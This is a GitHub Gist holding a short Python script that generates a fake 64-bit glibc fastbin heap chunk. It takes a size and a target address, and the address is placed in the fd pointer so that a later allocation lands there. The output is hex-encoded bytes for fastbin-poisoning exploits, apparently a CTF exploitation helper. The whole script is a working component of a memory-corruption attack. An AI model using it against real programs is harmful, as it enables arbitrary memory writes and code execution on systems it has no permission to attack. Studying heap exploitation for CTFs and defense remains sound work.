Last active
January 4, 2019 21:34
-
-
Save n30m1nd/a383b99464ba32aaa3849ddf56538e5d to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from __future__ import print_function | |
| from sys import argv, stdout, stderr | |
| import struct | |
| # 64 bit only for now | |
| def print_chunk(chunkpos, size): | |
| output = "\x00"*8 | |
| # A fastchunk should never exceed 0x80 bytes (unless overwriting max fastchunk global) so, no need to think about to chr bytes | |
| realsz = chr((size + (16 - (size % 16))) | 0x1) | |
| output+= realsz | |
| output+= "\x00"*7 | |
| output+= chunkpos + "\x00"*(8-len(chunkpos)) | |
| output+= "\x41" * (ord(realsz) - 1 - 8 - 8 - 8) | |
| print (output.encode('hex')) | |
| if __name__ == '__main__': | |
| if len(argv) > 2: | |
| print (("[+] Next free is going to be: victim->fd = %s " % argv[1]), file=stderr) | |
| chunkpos = struct.pack("<q", int(argv[1],16)) | |
| size = int(argv[2]) if "0x" not in argv[2] else int(argv[2], 16) | |
| print_chunk(chunkpos, size) | |
| else: | |
| print ("Usage: %s 0x630142 112 [or 0x70]" % argv[0], file=stderr) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment